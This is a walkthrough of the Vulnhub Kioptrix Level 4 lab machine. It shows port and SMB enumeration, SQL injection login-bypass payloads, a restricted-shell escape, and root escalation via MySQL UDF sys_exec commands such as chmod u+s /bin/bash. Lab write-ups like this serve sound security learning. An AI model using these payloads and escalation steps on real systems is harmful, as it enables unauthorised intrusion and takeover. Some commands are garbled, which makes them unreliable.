Vulnhub level4 Kioptrix Complete Walkthrough
Both Level 1,2, 3 are solved with the links below:-
Let’s solve level 4!!!
From here, I run a port scan against my machine to check the open ports/services.
Command: nmap -T4 -p- -A -oN nmap/initials 192.168.230.138
From initial Scans, you can see that the port number 22, 80, 139 and 445 are in open state.
On Port 22 > SSH Service is up and running with version OpenSSH 4.7p1
On Port 80 > HTTP Service is up and running with version Apache httpd 2.2.8.
On Port 139 and 445 > NetBIOS service is open which means I can easily enumerate SMB for any public facing sharing as well as usernames.
And for enumerating the usernames through NetBIOS using nmap, I ran the following command:
Command: nmap -T4 -p- -A –script=smb-enum-users 192.168.230.138
As you can see that, I got 5 username (john, loneferret, nobody, robert, root). Scanning with Nikto which is again one of the most popular open source vulnerability scanner.
Command: nikto -host 192.168.230.138
Let’s move on, and try to access the IP address in your browser i.e. http://192.168.230.138/ because the PORT 80 is open. And!!! I found a login page, let’s go ahead and attempt SQL Injection by typing single quote (‘) in both username and password field.
So here I confirmed that, the SQL Injection vulnerability is there so try to put some combinations like this:
U > admin, P > admin (Not Accepted)
U > john P > john (Not Accepted)
U > ‘or”=’ P > ‘or”=’ (Not Accepted)
U > ‘ OR 1=1– P > ‘ OR 1=1– (Not Accepted)
U > john P > 1′ or ‘1’=’1 (Accepted)
So here I successfully logged in with username (john) and password (1′ or ‘1’ = ’1). It also seems like we got the John’s real password.
Let’s try to do SSH with username john and password (MyNameIsJohn) by typing the following command in the terminal.
Command: ssh email@example.com
To bypass this limited shell, I used the following
Command: echo os.system(‘/bin/bash’)
that can easily be bypassed with the help of echo or vim command.Okay! now that I have more access as you can see that, I am now able to execute pwd command which tells your present working directory.Furthermore,I grep processes run by root user and mysql service running by typing the following command:
Command: ps -ef | grep root | grep mysql
Let’s see if I can find the D-B username and D-B password details in config file located at /var/www directory.
As you can see that, there is no password, so you can easily bypass MYSQL with UDF . It means you can easily escalate the privileges to root but first of all you need to first check whether the mysql service is running with root privileges or not by the following command:
Command: ls -la /usr/lib/lib_mysqludf_sys.so
Yes, the mysql service is running with root privileges, so now I can directly access the database with mysql client.
Command: mysql -h localhost -u root -p
“show databases;” will give you a list of all databases hosted at your target IP and also, run a usermod command with sys_exec to give john admin privileges.
Using sys_exec we were able to run usermod which added john to the admin group.
And then I ran sudo su to get the root shell.
You can also use select sys_exec(‘chmod u+s /bin/bash’); for privilege escalation to get the bash shell with full permissions.
AND it’s ROOT!!!, That’s all for this machine,
Until Next Time,
— — — — — — — — — — — — — — -